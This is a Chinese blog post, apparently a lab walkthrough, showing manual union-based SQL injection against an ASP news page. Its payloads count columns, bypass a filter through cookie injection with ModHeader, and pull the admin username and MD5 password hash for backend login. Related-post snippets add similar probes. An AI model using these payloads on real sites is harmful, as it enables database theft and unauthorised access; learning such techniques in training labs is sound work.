Sql Injection — 注入攻击原理-2(实战)

最新推荐文章于 2024-10-09 22:03:16 发布
最新推荐文章于 2024-10-09 22:03:16 发布
阅读量803 收藏 2
点赞数 1
分类专栏: 实战 文章标签: sql 数据库
Neatsuki-king
本文链接:https://blog.csdn.net/m0_54471074/article/details/131598185
版权
本文通过实战案例展示SQL注入攻击过程。在尝试注入时遇到防护,利用ModHeader工具修改请求头成功绕过,最终获取后台MD5加密的用户名和密码,实现登录。
摘要由CSDN通过智能技术生成

还是实战,如果没什么事的话几乎每天日更

目录

前言

sql实战-2

提示:以下是本篇文章正文内容,下面案例可供参考

一、

在这里插入图片描述
公司的新闻网
在这里插入图片描述
我们进入一篇文章,我们发现这个网页应该是ASP动态网页文件
还记得第一篇文章的sql注入吗?如果不知道的话,可以看看这里

?id=171 order by 10

在这里插入图片描述
哎呀,不出啊
那就试试11,12,13
在这里插入图片描述
哦,出错了,这说明什么,这说明此页面存在sql注入

?id=171 union select 1,2,3,4,5,6,7,8,9,10 from admin

插入吧
在这里插入图片描述
该死,有防,那怎么办,写不了了不更了,人走高飞
在这里插入图片描述
有防的?没关系,就用ModHeader,
Edge点这个下载
fire fox点击这个下载
新建Request头
刚安装的应该就有,不用新建
在这里插入图片描述
好了吗,如果准备好了,我们就继续,Let’s go

id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin

把这串代码扔到value,name取cookie,就像这样
在这里插入图片描述
在这里插入图片描述
出现了这个🤔

换,换上这个。

id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin

在这里插入图片描述
哎,这不就出来了吗

这是个什么玩意?b9a2a2b5dffb918c

这是MD5
在这里插入图片描述
好了GAME OVER
然后就帅气的进入后台
在这里插入图片描述
用户名一般都是admin
密码就是md5解密的密码
在这里插入图片描述

总结

总结就是:我头像真好看自恋重度患者

「已注销」
关注
专栏目录
在线靶场-墨者-SQL注入1星-SQL手工注入漏洞测试(MySQL数据库)
weixin_42079912的博客
07-18 2601
尝试在URL后,输入and 1=1显示正常,and 1=2显示不正常,判断此处存在SQL注入 order by 获取字段数为4 and 1=2 union select 1,2,3,4 发现2在原文Title处,3在content处 and 1=2 union select 1,version(),database(),4 爆库得到 and 1=2 union select 1,ve...
SQL注入原理讲解
幻染雨停轻的博客
09-16 2万+
本文转自http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。      网络安全成为了现在互联网的焦...
SQL注入攻击2(基础)
scholar_1的博客
07-10 610
今天,书生带来封神台在线演练靶场第二(接着写两篇看看反响如何,不行就停了)第一步:清楚需求是什么根据文字描述可以清楚,这的要求是绕过防火墙进入后台并拿走通钥匙(这种逻辑思路一定要清晰,要不然你都不知道要干什么)点击传送门,出现了如下页面(浏览器不支持Adobe Flash Player了,图片显不出来,有点尴尬): 随便在新闻动态内点开一条新闻链接: 可以看见页面连接显示的是: 其中shownews.asp是网站下的一个asp动态网页文件,从链接可看出,查询到了168条值(新闻内容)。第二步,
pikachu靶场SQL注入解题思路
weixin_44500257的博客
02-21 1587
第一 数字型注入(POST) 操作界面如下图 使用burpsuit对流量进行抓包,把数据包发送到Repeater模块进行测试 发送正常流量,web界面正常响应情况如下图所示 首先我们要了解该卡注意的考点①数据类型是数字型②提交方式是POST 注入点的判断有很多方式,核心的思想就是id=后面的参数能否带入数据库查询,如果参数是数据库查询语句能否执行payload语句。 判断第一步:id=1 后面加 ‘ “ ‘) “)来查询后台SQL查询语句id的闭合方式 ‘ 报错 “报错 ‘) 报错 “
sqlmap之cookie注入靶场第二题)
giun的博客
03-03 7139
sqlmap 靶场第二题:https://hack.zkaq.org/?a=battle&f=target&id=31ac789a52edf9bb 首先我们尝试下sql注入 http://120.203.13.75:8001/shownews.asp?id=171%20and%201=1 说明该网站有防cookie注入 ...
sql注入详解
热门推荐
内心不种满鲜花就会长满杂草
05-05 21万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相参数未经过滤直接带入数据库查询...
网络安全-SQL注入原理攻击及防御
关注网络安全、云原生安全
07-12 2万+
目录 SQL注入原理 SQL注入条件 防御SQL注入的方法 使用预编译语句 使用存储过程 检查数据类型 使用安全函数 SQL注入原理 程序员没有遵循代码与数据分离原则,使用户数据作为代码执行。 SQL注入条件 用户可以控制数据的输入。 原本要运行的代码拼接了用户的输入。 防御SQL注入的方法 使用预编译语句 绑定变量,攻击者无法改变SQL的结构。不同的编程语言Java、Php有不同的语法,就不做展示了。 使用存储过程 使用安全的存储过程对抗SQL注入,由于存储过程中也可能存在
探索SQL注入的艺术:SQL-Injection-Payloads项目深度揭秘
gitblog_00073的博客
05-30 275
探索SQL注入的艺术:SQL-Injection-Payloads项目深度揭秘 项目地址:https://gitcode.com/trietptm/SQL-Injection-Payloads 在网络安全的暗黑森林里,SQL注入攻击犹如一只潜伏的猛兽,威胁着无数应用的安全边界。而今,一款名为“SQL-Injection-Payloads”的开源工具横空出世,它如同一盏明灯,为安全研究人员和开发者照...
SQL注入攻击与防御 第2版》PDF版本下载.txt
07-17
- 《SQL注入攻击与防御 第2版》 - OWASP SQL Injection Prevention Cheat Sheet - SQL注入的技术博客和论坛讨论 以上内容涵盖了SQL注入的基本概念、原理、类型以及防御措施,并结合实际案例进行了深入分析。...
SQL注入攻击实验报告
05-07
- **新建网站SQLInjection项目**:使用MyEclipse创建一个新的Web项目,命名为SQLInjection。 - **index.jsp页面设计**:作为登录界面,包含用户名和密码的输入框,以及提交按钮。 - **处理流程**: - 用户输入...
SQL注入攻击实战演练
Appleteachers的博客
04-20 889
今天要介绍的是SQL注入实验。SQL注入攻击的学习,我们更多的目的是为了学习攻击技术和防范策略,而不是刻意去攻击数据库。 首先我们先进入实验地址《SQL 注入》。 SQL注入是一种代码注入技术,过去常常用于攻击数据驱动性的应用,实质就是将恶意的SQL代码注入到特定字段用于实施拖库攻击等。SQL注入的成功必须借助应用程序的安全漏洞,例如用户输入没有经过正确地过滤(针对某些特定字符串)或者没有特别强调类型的时候,都容易造成异常地执行SQL语句。SQL注入是网站渗透中最常用的攻击技术,但是其实SQL注入可以用来攻
SQL注入漏洞复现:探索不同类型的注入攻击方法
weixin_43263566的博客
08-26 1431
基于错误的注入(Error-based Injection):攻击者通过构造恶意的SQL语句,利用应用程序返回的错误信息来获取数据库中的敏感信息。基于联合查询的注入(Union-based Injection):攻击者通过在注入点处构造特殊的SQL语句,利用UNION命令将其他查询结果合并到原始查询中,从而获取额外的数据。基于时间延迟的注入(Time-based Injection):攻击者通过在注入点处构造特殊的SQL语句,
掌握嵌套子查询:复杂 SQL 中 * 列的准确表列
学习之余随便记记
10-05 858
本文重点讨论在具有 * 列的嵌套子查询中建立表和列之间正确系的挑战。使用 Teradata SQL 代码示例来说明该过程。本文聚焦于一个别名为 SUBSCRIBER_ 的子查询及其派生的列,这些列在外层查询中被使用。有些列在子查询的选择列表中被明确列出,而其他一些列则来自一个列(SUBSCR.),这个*列引用了 PRD2_ODW.SUBSCRIBER_ 表。接着,分析检查了外层查询的选择列表,特别是来自 SUBSCRIBER_ 子查询的列。
PostgreSQL常用数值处理函数简介
lunan的博客
10-04 612
这些数值处理函数提供了丰富的数值计算功能,从简单的数学操作到更高级的科学计算,满足了大多数数据库操作中的数值处理需求。
SQL】深入探索SQL调优:提升数据库性能的全面指南
最新发布
人生苦短,睡觉要紧,睡醒再说
10-09 977
在本文中,我们深入探讨了SQL调优的重要性及其在提升数据库性能中的键角色。从理解执行计划到选择合适的索引,每一个细节都能显著影响应用程序的响应速度和处理能力。我们强调了基本的优化原则,如避免使用SELECT *、合理使用JOIN,以及定期更新统计信息。同时,数据库配置和硬件优化也不可忽视,它们直接系到系统的整体性能。通过采用这些策略和技术,开发者和数据库管理员能够有效提高数据库的效率,确保系统在高负载下依然稳定运行。
Spring Data JPA
m0_73837751的博客
10-06 742
这个接口的定义是在数据持久层(DAO 层,Repository 层),主要用于自定义一些查询方法(这是这个接口最主要的作用)。接口内部可以通过命名规则定义自定义查询方法,以便在业务逻辑层调用。(1.3中的方法命名规则)。在 Spring Data JPA 中,你可以通过继承 CrudRepository或 JpaRepository接口来定义Repository,用于处理特定实体的 CRUD 操作。Spring 会自动生成这些接口中的方法实现。:这是最基本的接口,提供基本的增删改查操作,如save()
SQL之case when then用法
GDFHGFHGFH的博客
10-09 380
简单类型case sexwhen '1' then '男'when '2' then '女’else '其他' end搜索类型SELECTname,salary,CASEFROMemployees;CASE 语句是顺序敏感的,即它会从上到下评估 WHEN 子句,一旦找到第一个为真的条件,就会返回相应的结果,并忽略后面的所有条件。ELSE 子句是可选的。如果没有任何 WHEN 条件为真,并且没有提供 ELSE 子句,那么 CASE 表达式的结果将是 NULL。
SQL进阶技巧:如何优雅求解指标累计去重问题?
石榴姐yyds
10-02 864
本文给出了计算指标按照日期字段进行累计去重的优雅解法,文中采用了2种解法,一种借助于分析函数作为辅助变量生成状态标记求解,一种利用自联生成全量数据进行行行比较求解,两种方式都非常巧妙。
SQL注入实战SQLi-Labs完全攻略
"这篇文档是SQL注入的学习资料,主要聚焦于SQLi-Labs练习平台,由LCamry编撰。...这份资料是学习SQL注入和提升安全防护技能的理想资源,通过Sqli-labs的实战练习,读者可以逐步提高对SQL注入的理解和防范能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

「已注销」

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值